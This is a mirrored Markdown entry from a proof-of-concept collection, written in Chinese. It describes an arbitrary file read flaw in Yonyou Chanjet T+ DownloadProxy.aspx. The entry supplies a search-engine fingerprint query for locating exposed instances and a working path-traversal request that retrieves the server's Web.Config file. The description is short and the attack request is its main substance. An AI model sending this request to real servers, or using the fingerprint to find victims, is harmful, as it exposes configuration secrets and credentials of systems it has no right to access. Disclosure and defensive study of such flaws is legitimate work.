admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞.md

33 lines
542 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
## 漏洞描述
用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器上的敏感文件
## 漏洞影响
```
用友 畅捷通T+
```
## 网络测绘
```
app="畅捷通-TPlus"
```
## 漏洞复现
登录页面
![image-20220909104559292](images/202209091045361.png)
验证POC
```
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
```
![image-20220909104628456](images/202209091046535.png)
Reference in New Issue Copy Permalink